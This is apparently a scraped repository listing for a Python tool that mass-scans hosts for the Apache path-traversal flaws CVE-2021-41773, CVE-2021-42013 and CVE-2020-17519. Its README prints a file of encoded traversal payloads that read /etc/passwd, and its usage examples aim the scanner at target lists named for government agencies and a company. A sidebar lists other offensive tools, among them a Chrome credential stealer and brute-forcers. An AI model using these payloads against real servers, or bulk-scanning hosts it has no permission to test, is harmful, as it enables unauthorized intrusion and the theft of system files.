It's a simple tool for test vulnerability Apache Path Traversal

Related tags

Security related resourcescve-2020-17519cve-2021-41773cve-2021-42013
Overview

SimplesApachePathTraversal

Banner Simples Apache Path Traversal

Simples Apache Path Traversal

It's a simple tool for test vulnerability Apache Path Traversal
https://blog.mrcl0wn.com/2021/10/uma-simples-tool-para-apache-path.html

GPL License GitHub code size in bytes Python 3.8 Supported_OS Linux orange Supported OS Mac 

Autor:    MrCl0wn
Blog:     https://blog.mrcl0wn.com
GitHub:   https://github.com/MrCl0wnLab
Twitter:  https://twitter.com/MrCl0wnLab
Email:    mrcl0wnlab\@\gmail.com

Gr33ts:
+ aCCESS Security Lab @exchangesec
   - Megarushing, Ofjaaaah, 5Ub5010, Gh05tPT, Hunt3rPl4nk

Path traversal (software bug)

A path traversal attack (also known as directory traversal) aims to access files and directories that are stored outside the web root folder. By manipulating variables that reference files with “dot-dot-slash (../)” sequences and its variations or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system including application source code or configuration and critical system files. It should be noted that access to files is limited by system operational access control (such as in the case of locked or in-use files on the Microsoft Windows operating system).

Disclaimer

This or previous program is for Educational purpose ONLY. Do not use it without permission. 
The usual disclaimer applies, especially the fact that me (MrCl0wnLab) is not liable for any 
damages caused by direct or indirect use of the information or functionality provided by these 
programs. The author or any Internet provider bears NO responsibility for content or misuse 
of these programs or any derivatives thereof. By using these programs you accept the fact 
that any damage (dataloss, system crash, system compromise, etc.) caused by the use of these 
programs is not MrCl0wnLab's responsibility.

This script checks for vulnerabilities

Commands

python main.py --file gov.br.txt  --thread 15
python main.py --file tesla.txt  --ssl
python main.py --range 192.168.15.1,192.168.15.100 --thread 30 
python main.py --file fbi.gov.txt  --thread 15 --timeout 3 
python main.py --file gov.ru.txt  --debug

Screenshots

Screenshot Screenshot

Flow to generate targets

Screenshot

Help

python main.py --help
 
                                   .,,
                                  (=\/\
                                   \=\/\
                                    \=\/\
                                     `=\/
                                        \                                                                                                                  
           simples [ APACHE ]
           ___      _   _       _____                                    _ 
          / _ \__ _| |_| |__   /__   \_ __ __ ___   _____ _ __ ___  __ _| |
         / /_)/ _` | __| '_ \    / /\/ '__/ _` \ \ / / _ \ '__/ __|/ _` | |
        / ___/ (_| | |_| | | |  / /  | | | (_| |\ V /  __/ |  \__ \ (_| | |
        \/    \__,_|\__|_| |_|  \/   |_|  \__,_| \_/ \___|_|  |___/\__,_|_|
                                                                   
              
                      By: MrCl0wn / https://blog.mrcl0wn.com
                                    https://twitter.com/MrCl0wnLab 
                                    https://github.com/MrCl0wnLab                                                                         
         
usage: tool [-h] [--file 
   
    ] [--range 
    
     ,
     
      ]
     
    
   
            [--thread <20>] [--ssl] [--timeout <5>] [--debug]

[!] Check: CVE-2021-41773, CVE-2021-42013, CVE-2020-17519
[!] File exploits: /assets/exploits.json
[!] Output: output/vuln.txt

python main.py --file gov.br.txt  --thread 15
python main.py --file tesla.txt  --ssl
python main.py --range 192.168.15.1,192.168.15.100 --thread 30 
python main.py --file fbi.gov.txt  --thread 15 --timeout 3 
python main.py --file gov.ru.txt  --debug

optional arguments:
  -h, --help            show this help message and exit
  --file 
   
          Input your target host lists
   
  --range 
   
    ,
    
   
                        Set range IP Eg.: 192.168.15.1,192.168.15.100
  --thread <20>, -t <20>
                        Eg. 20
  --ssl                 Enable request with SSL
  --timeout <5>         Set connection timeout
  --debug, -d           Enable debug mode

Tree

.
├── assets
│   ├── autor.json
│   ├── config.json
│   ├── exploits.json
│   └── prints
│       ├── banner.png
│       ├── print01.png
│       └── print02.png
├── LICENSE
├── main.py
├── modules
│   ├── banner_mrclw.py
│   ├── color_mrclw.py
│   ├── debug_mrclw.py
│   ├── file_mrclw.py
│   ├── __init__.py
│   ├── request_mrclw.py
│   ├── shodan_mrclw.py
│   └── thread_mrclw.py
├── output
└── README.md

File exploit

assets/exploits.json

{
    "CVE-2021-41773": "/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd",
    "CVE-2021-42013-0": "/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd",
    "CVE-2021-42013-1": "/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd",
    "CVE-2021-42013-3": "/cgi-bin/.%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd",
    "CVE-2021-42013-4":"/cgi-bin/%25%25%25%2e/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd",
    "CVE-2020-17519-0":"/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd",
    "CVE-2020-17519-1":"/cgi-bin/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd"
}

Ref.

Owner
Mr. Cl0wn - H4ck1ng C0d3r
GED (Gambiarra, Exploit and Development ) / Member of Osint Brazuca Project
Mr. Cl0wn - H4ck1ng C0d3r
GitHub Repository https://blog.mrcl0wn.com/2021/10/uma-simples-tool-para-apache-path.html
OpenPort scanner GUI tool (CNMAP)

CNMAP-GUI- OpenPort scanner GUI tool (CNMAP) as you know it is the advanced tool to find open port, firewalls and we also added here heartbleed scanni

9 Mar 05, 2022
Automatically download all 10,000 CryptoPunk NFTs.

CryptoPunk Stealer The sole purpose of this script is to download the entire CryptoPunk NFT collection. How does it work? Basically, the website where

Dan 7 Oct 22, 2022
DNS hijacking via dead records automation tool

DeadDNS Multi-threaded DNS hijacking via dead records automation tool How it works 1) Dig provided subdomains file for dead DNS records. 2) Dig the fo

45 Dec 20, 2022
It's a simple tool for test vulnerability shellshock

Shellshock, also known as Bashdoor, is a family of security bugs in the Unix Bash shell, the first of which was disclosed on 24 September 2014. Shellshock could enable an attacker to cause Bash to ex

Mr. Cl0wn - H4ck1ng C0d3r 88 Dec 23, 2022
md5 hash cracking with python.

Python-Md5-Cracker- md5 hash cracking with python. Original files added First create a file called word.txt then run the wordCreate.py script The task

Nebil Sharifi 0 Aug 31, 2022
Implementation of RITA (Real Intelligence Threat Analytics) in Jupyter Notebook with improved scoring algorithm.

RITA (Real Intelligence Threat Analytics) in Jupyter Notebook RITA is an open source framework for network traffic analysis sponsored by Active Counte

Mehmet E. 157 Nov 24, 2022
Learning to compose soft prompts for compositional zero-shot learning.

Compositional Soft Prompting (CSP) Compositional soft prompting (CSP), a parameter-efficient learning technique to improve the zero-shot compositional

Bats Research 32 Jan 02, 2023
Dome - Subdomain Enumeration Tool. Fast and reliable python script that makes active and/or passive scan to obtain subdomains and search for open ports.

DOME - A subdomain enumeration tool Check the Spanish Version Dome is a fast and reliable python script that makes active and/or passive scan to obtai

Vadi 329 Jan 01, 2023
OpenSource Poc && Vulnerable-Target Storage Box.

reapoc OpenSource Poc && Vulnerable-Target Storage Box. We are aming to collect different normalized poc and the vulerable target to verify it. Now re

cckuailong 560 Dec 23, 2022
Apache Solr SSRF(CVE-2021-27905)

Solr-SSRF Apache Solr SSRF #Use [-] Apache Solr SSRF漏洞 (CVE-2021-27905) [-] Options: -h or --help : 方法说明 -u or --url

Henry4E36 70 Nov 09, 2022
SpiderFoot automates OSINT collection so that you can focus on analysis.

SpiderFoot is an open source intelligence (OSINT) automation tool. It integrates with just about every data source available and utilises a range of m

Steve Micallef 9k Jan 08, 2023
Wordlist attacks on Bitwarden data.json files

BitwardenDecryptBrute This is a slightly modified version of BitwardenDecrypt. In addition to the decryption this version can do wordlist attacks for

42 Nov 09, 2022
A deobfuscator for multiple python obfuscators

PY4COC A deobfuscator for multiple python obfuscators, supports exe's packed with pyinstaller too. How to use python3 py4coc.py exe file or py file o

svenskithesource 16 Dec 03, 2022
A python script to brute-force guess the passwords to Instagram accounts

Instagram-Brute-Force The purpose of this script is to brute-force guess the passwords to Instagram accounts. Specifics: Comes with 2 separate modes i

Moondog 2 Nov 16, 2021
A simple multi-threaded distributed SSH brute-forcing tool written in Python.

OrbitalDump A simple multi-threaded distributed SSH brute-forcing tool written in Python. How it Works When the script is executed without the --proxi

K4YT3X 408 Jan 03, 2023
MS-FSRVP coercion abuse PoC

ShadowCoerce MS-FSRVP coercion abuse PoC Credits: Gilles LIONEL (a.k.a. Topotam)

Shutdown 219 Dec 28, 2022
Chrome Post-Exploitation is a client-server Chrome exploit to remotely allow an attacker access to Chrome passwords, downloads, history, and more.

ChromePE [Linux/Windows] Chrome Post-Exploitation is a client-server Chrome exploit to remotely allow an attacker access to Chrome passwords, download

Finn Lancaster 3 Oct 05, 2022
Oh365UserFinder is used for identifying valid o365 accounts without the risk of account lockouts.

Oh365 User Finder Oh365UserFinder is used for identifying valid o365 accounts without the risk of account lockouts. The tool parses responses to ident

Joe Helle 414 Jan 02, 2023
Bypass 4xx HTTP response status codes.

Forbidden Bypass 4xx HTTP response status codes. To see all the test cases, check the source code - follow the NOTE comments. Script uses multithreadi

Ivan Šincek 165 Dec 28, 2022
PrivateRoom - Make your work private by building a system using arduino which instantly kills a program when someone enters your room/cabin

privateRoom Make your work private by building a system using arduino which instantly kills a program when someone enters your room/cabin STEPS: Uploa

Divyanshu Kumar 3 Nov 08, 2022